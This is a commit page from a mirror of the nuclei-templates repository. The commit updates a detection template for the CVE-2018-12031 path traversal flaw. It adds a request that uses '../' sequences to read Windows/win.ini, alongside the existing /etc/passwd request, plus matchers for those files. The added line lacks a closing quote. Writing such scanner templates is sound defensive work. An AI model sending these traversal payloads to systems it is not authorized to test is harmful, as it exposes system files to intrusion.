daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2018-12031.yaml

patch-1
Prince Chaddha 2021-07-16 17:36:12 +05:30 committed by GitHub
parent 0f923915c9
commit 110a989ff1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
cves/2018/CVE-2018-12031.yaml
View File

@ -15,12 +15,15 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:[0*]:0:0" - "root:[0*]:0:0"
- "\\[(font|extension|file)s\\]"
condition: or
part: body part: body
- type: status - type: status
status: status: